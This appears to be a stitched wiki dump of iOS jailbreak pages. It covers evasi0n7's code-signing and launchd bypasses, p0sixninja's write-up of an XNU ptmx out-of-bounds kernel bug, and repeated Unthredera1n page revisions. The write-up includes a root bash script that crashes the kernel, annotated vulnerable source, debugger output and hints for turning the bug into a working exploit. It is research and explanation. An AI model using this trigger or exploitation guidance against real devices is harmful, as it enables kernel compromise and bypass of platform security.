* at this point, /var/mobile/Library/Logs/AppleSupport is symlinked to /dev/rdisk0s1 the device is rebooted, and something early in boot (i believe ReportCrash) will chown that path to mobile which chowns rdisk

* they have an HFS library that has an AFC backend, so they're able to virtually mount the entire system partition via AFC by seeking around on the rdisk using AFC commands. so using that, they modify the system partition the changes to the system partition are adding an executable which is signed with a self-signed cert at /evasi0n7 and a launchd plist to run it at boot

* they use the same CS bypass used before to modify libmis.dylib which is loaded by amfid (which checks code signatures) to neuter the amfi checks and alawys return true (i.e. to MISValidateSignature)

* so evasi0n will run fine, and at that point it does the kernel portion

* they also have to do this trick involving another codeless library containing this xpcd_cache blob to bypass a change in iOS 7 (or was it 6) where launchctl will only load plists from signed libraries

See followups at [https://twitter.com/drspringfield @drspringfield].

=== [http://geohot.com/e7writeup.html Write-up by geohot] ===

=== Write-up by p0sixninja ===

The vulnerability is an out of bounds array in the _state.pis_ioctl_list array by specifying an overly large minor device node number. By placing data in a known location past the array it's possible to hijack the tty structure and special read and write data from ioctl calls, and control function pointers to control execution.

The exploit is actually quite simple to trigger. I discovered this with a simple fuzzing script to test out every single device node. Here's a small sample script that should crash the latest maverick update. please run this as root.

#!/bin/bash

for i in `seq 1 255`; do
echo "Node $i";
mknod /dev/crash c 16 $i;
echo "Hello World" >/dev/crash;
rm -rf /dev/crash;
done;

The 16 major device node actually is mapped to the ptmx/ptsd pseudo terminal system. It seems that only 16 spaces are allocated for these terminals and if you make a device node with major 16 and minor larger that 16 you start getting out of bounds of the array. The maximum size of device nodes are about 0x600000 giving to the ability to offset your pointer into a crafted structure very large. The only hard part is finding which zones are ahead of your array you can index into. The exploit itself is in the bsd/kernel/tty_ptmx.c file in XNU kernel. The crash happens in…

int ptsd_open(dev_t dev, int flag, __unused int devtype, __unused proc_t p);

The problem is they lack the check to see if the minor number is higher than the number of spots allocated. The problem comes down to this, I'll try to comment code as I go through it...

FREE_BSDSTATIC int
ptsd_open(dev_t dev, int flag, __unused int devtype, __unused proc_t p)
{
struct tty *tp;
struct ptmx_ioctl *pti;
int error;

/*
* The dev_t structure holds the bits extracted and used to offset
* in an array
*/

// We'll check this function out first, check below
if ((pti = ptmx_get_ioctl(minor(dev), 0)) == NULL) {
return (ENXIO);
}

// Here's where the crash happens
if (!(pti->pt_flags & PF_UNLOCKED)) {
return (EAGAIN);
}

// This is the pointer we want to control
tp = pti->pt_tty;
tty_lock(tp);

if ((tp->t_state & TS_ISOPEN) == 0) {
termioschars(&tp->t_termios); /* Set up default chars */
tp->t_iflag = TTYDEF_IFLAG;
tp->t_oflag = TTYDEF_OFLAG;
tp->t_lflag = TTYDEF_LFLAG;
tp->t_cflag = TTYDEF_CFLAG;
tp->t_ispeed = tp->t_ospeed = TTYDEF_SPEED;
ttsetwater(tp); /* would be done in xxparam() */
} else if (tp->t_state&TS_XCLUDE && suser(kauth_cred_get(), NULL)) {
error = EBUSY;
goto out;
}
if (tp->t_oproc) /* Ctrlr still around. */
(void)(*linesw[tp->t_line].l_modem)(tp, 1);
while ((tp->t_state & TS_CARR_ON) == 0) {
if (flag&FNONBLOCK)
break;
error = ttysleep(tp, TSA_CARR_ON(tp), TTIPRI | PCATCH,
"ptsd_opn", 0);
if (error)
goto out;
}
error = (*linesw[tp->t_line].l_open)(dev, tp);
/* Successful open; mark as open by the slave */
pti->pt_flags |= PF_OPEN_S;
CLR(tp->t_state, TS_IOCTL_NOT_OK);
if (error == 0)
ptmx_wakeup(tp, FREAD|FWRITE);
out:
tty_unlock(tp);
return (error);
}

/*
* Given a minor number, return the corresponding structure for that minor
* number. If there isn't one, and the create flag is specified, we create
* one if possible.
*
* Parameters: minor Minor number of ptmx device
* open_flag PF_OPEN_M First open of master
* PF_OPEN_S First open of slave
* 0 Just want ioctl struct
*
* Returns: NULL Did not exist/could not create
* !NULL structure corresponding minor number
*
* Locks: tty_lock() on ptmx_ioctl->pt_tty NOT held on entry or exit.
*/
static struct ptmx_ioctl *
ptmx_get_ioctl(int minor, int open_flag)
{
struct ptmx_ioctl *new_ptmx_ioctl;

// For normal open() syscalls this flag is never set
if (open_flag & PF_OPEN_M) {

/*
* If we are about to allocate more memory, but we have
* already hit the administrative limit, then fail the
* operation.
*
* Note: Subtract free from total when making this
* check to allow unit increments, rather than
* snapping to the nearest PTMX_GROW_VECTOR...
*/
if ((_state.pis_total - _state.pis_free) >= ptmx_max) {
return (NULL);
}

MALLOC(new_ptmx_ioctl, struct ptmx_ioctl *, sizeof(struct ptmx_ioctl), M_TTYS, M_WAITOK|M_ZERO);
if (new_ptmx_ioctl == NULL) {
return (NULL);
}

if ((new_ptmx_ioctl->pt_tty = ttymalloc()) == NULL) {
FREE(new_ptmx_ioctl, M_TTYS);
return (NULL);
}

/*
* Hold the DEVFS_LOCK() over this whole operation; devfs
* itself does this over malloc/free as well, so this should
* be safe to do. We hold it longer than we want to, but
* doing so avoids a reallocation race on the minor number.
*/
DEVFS_LOCK();
/* Need to allocate a larger vector? */
if (_state.pis_free == 0) {
struct ptmx_ioctl **new_pis_ioctl_list;
struct ptmx_ioctl **old_pis_ioctl_list = NULL;

/* Yes. */
MALLOC(new_pis_ioctl_list, struct ptmx_ioctl **, sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR), M_TTYS, M_WAITOK|M_ZERO);
if (new_pis_ioctl_list == NULL) {
ttyfree(new_ptmx_ioctl->pt_tty);
DEVFS_UNLOCK();
FREE(new_ptmx_ioctl, M_TTYS);
return (NULL);
}

/* If this is not the first time, copy the old over */
bcopy(_state.pis_ioctl_list, new_pis_ioctl_list, sizeof(struct ptmx_ioctl *) * _state.pis_total);
old_pis_ioctl_list = _state.pis_ioctl_list;
_state.pis_ioctl_list = new_pis_ioctl_list;
_state.pis_free += PTMX_GROW_VECTOR;
_state.pis_total += PTMX_GROW_VECTOR;
if (old_pis_ioctl_list)
FREE(old_pis_ioctl_list, M_TTYS);
}

if (_state.pis_ioctl_list[minor] != NULL) {
ttyfree(new_ptmx_ioctl->pt_tty);
DEVFS_UNLOCK();
FREE(new_ptmx_ioctl, M_TTYS);

/* Special error value so we know to redrive the open, we've been raced */
return (struct ptmx_ioctl*)-1;

}

/* Vector is large enough; grab a new ptmx_ioctl */

/* Now grab a free slot... */
_state.pis_ioctl_list[minor] = new_ptmx_ioctl;

/* reduce free count */
_state.pis_free--;

_state.pis_ioctl_list[minor]->pt_flags |= PF_OPEN_M;
DEVFS_UNLOCK();

/* Create the /dev/ttysXXX device {<major>,XXX} */
_state.pis_ioctl_list[minor]->pt_devhandle = devfs_make_node(
makedev(ptsd_major, minor),
DEVFS_CHAR, UID_ROOT, GID_TTY, 0620,
PTSD_TEMPLATE, minor);
if (_state.pis_ioctl_list[minor]->pt_devhandle == NULL) {
printf("devfs_make_node() call failed for ptmx_get_ioctl()!!!!\n");
}
} else if (open_flag & PF_OPEN_S) {
DEVFS_LOCK();
_state.pis_ioctl_list[minor]->pt_flags |= PF_OPEN_S;
DEVFS_UNLOCK();
}

// No else statement to catch errors just return the index to the array faithfully.
return (_state.pis_ioctl_list[minor]);
}

First notice the (open_flag & PF_OPEN_M), if this is not true a lot of code will be skipped. on the ptmx devices, this isn't set so all this is complete skipped and we can skip to the end of the the code since there is no all catching else clause to handle most connections. It just automatically returns this array indexed with a user controllable value. Crash but true, let's look more into this structure we can control if we create a large minor number.

static struct _ptmx_ioctl_state {
struct ptmx_ioctl **pis_ioctl_list; /* pointer vector */
int pis_total; /* total slots */
int pis_free; /* free slots */
} _state;

This just contains a pointer vector of ptmx_ioctl structures, let's look at the structure which should be contained in the minor number offset.

/*
* ptmx_ioctl is a pointer to a list of pointers to tty structures which is
* grown, as necessary, copied, and replaced, but never shrunk. The ioctl
* structures themselves pointed to from this list come and go as needed.
*/
struct ptmx_ioctl {
struct tty *pt_tty; /* pointer to ttymalloc()'ed data */
int pt_flags;
struct selinfo pt_selr;
struct selinfo pt_selw;
u_char pt_send;
u_char pt_ucntl;
void *pt_devhandle; /* cloned slave device handle */
};

The first pointer in this structure is a pointer to a tty structure. This structure is easily readable and writable using using user land APIS. It also includes some function pointers in there which can be triggered to gain

struct tty {
lck_mtx_t t_lock; /* Per tty lock */

struct clist t_rawq; /* Device raw input queue. */
long t_rawcc; /* Raw input queue statistics. */
struct clist t_canq; /* Device canonical queue. */
long t_cancc; /* Canonical queue statistics. */
struct clist t_outq; /* Device output queue. */
long t_outcc; /* Output queue statistics. */
int t_line; /* Interface to device drivers. */
dev_t t_dev; /* Device. */
int t_state; /* Device and driver (TS*) state. */
int t_flags; /* Tty flags. */
int t_timeout; /* Timeout for ttywait() */
struct pgrp *t_pgrp; /* Foreground process group. */
struct session *t_session; /* Enclosing session. */
struct selinfo t_rsel; /* Tty read/oob select. */
struct selinfo t_wsel; /* Tty write select. */
struct termios t_termios; /* Termios state. */
struct winsize t_winsize; /* Window size. */
/* Start output. */
void (*t_oproc)(struct tty *);
/* Stop output. */
void (*t_stop)(struct tty *, int);
/* Set hardware state. */
int (*t_param)(struct tty *, struct termios *);
void *t_sc; /* XXX: net/if_sl.c:sl_softc. */
int t_column; /* Tty output column. */
int t_rocount, t_rocol; /* Tty. */
int t_hiwat; /* High water mark. */
int t_lowat; /* Low water mark. */
int t_gen; /* Generation number. */
void *t_iokit; /* IOKit management */
int t_refcnt; /* reference count */
};

You can imagine all the power you could do if you can control all these structures carefully. That will be the difficulty when trying to exploit. You need to find a kernel zone past this array and allocate your data into it in a way you always know the offset. shouldn't be too hard.

Here's what the crash looks like once triggered.

bash-3.2# for i in `seq 1 255`;do echo $i; mknod /dev/crash c 16 $i;echo "Hello" >/dev/crash;rm -rf /dev/crash;done

in gdb remote kernel debugger…

gdb$ bt
#0 0xffffff8024f35fbc in ptsd_open (dev=0x10000010, flag=0x402, devtype=0x2000, p=0xffffff803655a3f8) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/kern/tty_ptmx.c:571
#1 0xffffff8024bdd93f in spec_open (ap=0xffffff8225cb3928) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/miscfs/specfs/spec_vnops.c:325
#2 0xffffff8024bc43c9 in VNOP_OPEN (vp=0xffffff803809c110, mode=0x402, ctx=0xffffff8035bcdd08) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/kpi_vfs.c:3015
#3 0xffffff8024bb4eab in vn_open_auth (ndp=0xffffff8225cb3b70, fmodep=0xffffff8225cb3adc, vap=0xffffff8225cb3d08) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/vfs_vnops.c:591
#4 0xffffff8024b9d8db in open1 (ctx=0xffffff8035bcdd08, ndp=0xffffff8225cb3b70, uflags=0x601, vap=0xffffff8225cb3d08, fp_zalloc=0xffffff8024ecf0b0 <fileproc_alloc_init>, cra=0x0, retval=0xffffff8035bcdc18) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/vfs_syscalls.c:3067
#5 0xffffff8024b9e684 in open_nocancel (p=0xffffff803655a3f8, uap=0xffffff8035c3a920, retval=0xffffff8035bcdc18) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/vfs_syscalls.c:3345
#6 0xffffff8024b9e4fc in open (p=0xffffff803655a3f8, uap=0xffffff8035c3a920, retval=0xffffff8035bcdc18) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/vfs_syscalls.c:3326
#7 0xffffff8024fa3828 in unix_syscall64 (state=0xffffff8035c3a910) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/dev/i386/systemcalls.c:370

gdb$ i r
rax 0xdeadbeefdeadbeef 0xdeadbeefdeadbeef
rbx 0xffffff80367ea168 0xffffff80367ea168
rcx 0xffffff8033ec8788 0xffffff8033ec8788
rdx 0x10 0x10
rsi 0x0 0x0
rdi 0x10 0x10
rbp 0xffffff8225cb3870 0xffffff8225cb3870
rsp 0xffffff8225cb3840 0xffffff8225cb3840
r8 0x402 0x402
r9 0x1 0x1
r10 0xffffff80327c6220 0xffffff80327c6220
r11 0x0 0x0
r12 0xffffff8225cb3fc0 0xffffff8225cb3fc0
r13 0x7f9190c045b0 0x7f9190c045b0
r14 0xffffffff 0xffffffff
r15 0xffffff8035c3a910 0xffffff8035c3a910
rip 0xffffff8024f35fbc 0xffffff8024f35fbc <ptsd_open+76>
eflags 0x10282 0x10282
cs 0x8 0x8
ss 0x0 0x0
ds 0x0 0x0
es 0x0 0x0
fs 0xdead0000 0xdead0000
gs 0xdead0000 0xdead0000

it was trying to read in the value of _state.pis_ioctl_list[10].

gdb$ print _state.pis_ioctl_list[10]
$1 = (struct ptmx_ioctl *) 0xdeadbeefdeadbeef

gdb$ print pti
$2 = (struct ptmx_ioctl *) 0xdeadbeefdeadbeef

It crashes here before dereferenceing the tty structure at the beginning of the ptmx_ioctl structure. We must know it's an address, but we also leak a bit near the address if it is an address. We should also be able to retrieve the value of all these state variables it sets from variable bits wherever the pointer is at to see if it's the correct pointer or not.

571 * if (!(pti->pt_flags & PF_UNLOCKED)) {
572 return (EAGAIN);
573 }
574
575 tp = pti->pt_tty;
576 tty_lock(tp);
577
578 if ((tp->t_state & TS_ISOPEN) == 0) {
579 termioschars(&tp->t_termios); /* Set up default chars */

Examine the read, write, and select apis for these terminals to learn all you can do. ioctl calls might also be interesting. Also since it uses the tty zone for allocating this devices, it might be a very predictable zone if we can control all the pseudo terminals. Also checking out return values based on flags in structs can be a good way to feel around in memory.

New in iOS 7.0 security protections, you are now no longer allowed to remount the root partition as readable/writeable. Before we just change the /etc/fstab file to remount the filesystems, but now there is a special kernel check preventing root filesystem from being remounted. Also the user filesystem containing all the data is mounted to disallow super user files, and device nodes. Luckily, if we can remount the user filesystem to reallow superuser and device node files we can create this device node and launch the kernel exploit on iOS7.

== See Also ==
* [[evad3rs]]
* [[evasi0n]]

== References ==
<references />

[[Category:Jailbreaks]]

Unthredera1n

2014-02-24T21:08:23Z

I3ppwn: Added source code

{{lowercase}}
'''[http://unthreadedjb.com unthredera1n]''' is an [[untethered jailbreak]] for [[n18ap|iPod touch 3G]], [[iPhone 3GS]] and [[A4]] devices except [[k66ap|Apple TV 2G]] running iOS 4.3.4, 4.3.5, 5.0, 5.0.1, 5.1 and 5.1.1. It is currently available for Linux (x86_64) and OS X. Not much is currently known about this tool.

== unthredeh4il ==
[[unthredera1n|unthredeh4il]] is an improved version of [[unthredera1n]] for [[n18ap|iPod touch 3G]], [[iPhone 3GS]] and [[A4]] devices including [[K66ap|Apple TV 2G]] running iOS 4.2.6, 4.2.7, 4.2.8, 4.2.9, 4.2.10, 4.3, 4.3.1, 4.3.2, 4.3.3, 4.3.4, 4.3.5, 5.0, 5.0.1, 5.1 and 5.1.1 including Apple TV OS versions: 4.2, 4.2.1, 4.3 (all versions), 4.4, 4.4.1, 4.4.2, 4.4.3, 4.4.4, 5.0, and 5.0.1. This is still an [[untethered jailbreak]].

== Controversy ==
On Reddit, where [http://www.reddit.com/r/jailbreak/comments/1j4u02/we_hav_releese_isounthreadedjb_redy_4_dl/cbbapvp planetbeing and saurik discussed unthredera1n], saurik said:

<blockquote>
The program is custom; it is using the Rocky Racoon packet filter kernel exploit, but the evasi0n amfid bypass. I verified this somewhat by glancing at the binary (opens /dev/pf, etc.), but they also say this explicitly in some strings inside of the binary (which might be output when it runs or something) and in a hidden readme file.
From .REAL_USAGE:
<blockquote>Thanks to @Chronic-Dev/@planetbeing/@posixninja for the original rocky-raccon pf kernel exploit. Thanks to @evad3rs for their awesome MobileBackup2 stuff. It worked really well on this.</blockquote>
From jb binary:
<blockquote>WE R NOT #FAKR, UNTHREADEDJB IS REEL tanks 2 @planetbeing n @posixninja n @chronicdev for #explot code in rkcy raccon :) :) :) krnl patchs from #opensn0w ))</blockquote>
</blockquote>

== Exploits ==
*MobileBackup2
*AMFI.dylib
*launchd.conf

===References===
* [http://pastie.org/8255242 unthredeh4il supported firmwares/devices]
* [https://github.com/Malvix/isounthreadedjb Github source code ]
* [http://www.reddit.com/r/jailbreak/comments/1kjddw/we_r_relees_ful_src_code_of_unthreaddra1n_clasic/cbplh58 Comments from planetbeing and Saurik]

{{stub|jailbreaking}}
[[Category:Jailbreaks]]

Unthredera1n

2014-01-01T16:34:54Z

I3ppwn:

{{lowercase}}
'''[http://unthreadedjb.com unthredera1n]''' is an [[untethered jailbreak]] for [[n18ap|iPod touch 3G]], [[iPhone 3GS]] and [[A4]] devices except [[k66ap|Apple TV 2G]] running iOS 4.3.4, 4.3.5, 5.0, 5.0.1, 5.1 and 5.1.1. It is currently available for Linux (x86_64) and OS X. Not much is currently known about this tool.

== unthredeh4il ==
[[unthredera1n|unthredeh4il]] is an improved version of [[unthredera1n]] for [[n18ap|iPod touch 3G]], [[iPhone 3GS]] and [[A4]] devices including [[K66ap|Apple TV 2G]] running iOS 4.2.6, 4.2.7, 4.2.8, 4.2.9, 4.2.10, 4.3, 4.3.1, 4.3.2, 4.3.3, 4.3.4, 4.3.5, 5.0, 5.0.1, 5.1 and 5.1.1 including Apple TV OS versions: 4.2, 4.2.1, 4.3 (all versions), 4.4, 4.4.1, 4.4.2, 4.4.3, 4.4.4, 5.0, and 5.0.1. This is still an [[untethered jailbreak]].

== Controversy ==
On Reddit, where [http://www.reddit.com/r/jailbreak/comments/1j4u02/we_hav_releese_isounthreadedjb_redy_4_dl/cbbapvp planetbeing and saurik discussed unthredera1n], saurik said:

<blockquote>
The program is custom; it is using the Rocky Racoon packet filter kernel exploit, but the evasi0n amfid bypass. I verified this somewhat by glancing at the binary (opens /dev/pf, etc.), but they also say this explicitly in some strings inside of the binary (which might be output when it runs or something) and in a hidden readme file.
From .REAL_USAGE:
<blockquote>Thanks to @Chronic-Dev/@planetbeing/@posixninja for the original rocky-raccon pf kernel exploit. Thanks to @evad3rs for their awesome MobileBackup2 stuff. It worked really well on this.</blockquote>
From jb binary:
<blockquote>WE R NOT #FAKR, UNTHREADEDJB IS REEL tanks 2 @planetbeing n @posixninja n @chronicdev for #explot code in rkcy raccon :) :) :) krnl patchs from #opensn0w ))</blockquote>
</blockquote>

== Exploits ==
*MobileBackup2
*AMFI.dylib
*launchd.conf

===References===
* [http://pastie.org/8255242 unthredeh4il supported firmwares/devices]
* [https://github.com/UnthreadedJB/isounthreadedjb Github source code (down now)]
* [http://www.reddit.com/r/jailbreak/comments/1kjddw/we_r_relees_ful_src_code_of_unthreaddra1n_clasic/cbplh58 Comments from planetbeing and Saurik]

{{stub|jailbreaking}}
[[Category:Jailbreaks]]

P0sixspwn

2014-01-01T12:15:33Z

I3ppwn: /* Exploits */

P0sixspwn

2014-01-01T12:15:12Z

I3ppwn: /* Exploits */

P0sixspwn

2014-01-01T12:14:55Z

I3ppwn: /* Exploits = */

P0sixspwn

2014-01-01T12:14:41Z

I3ppwn: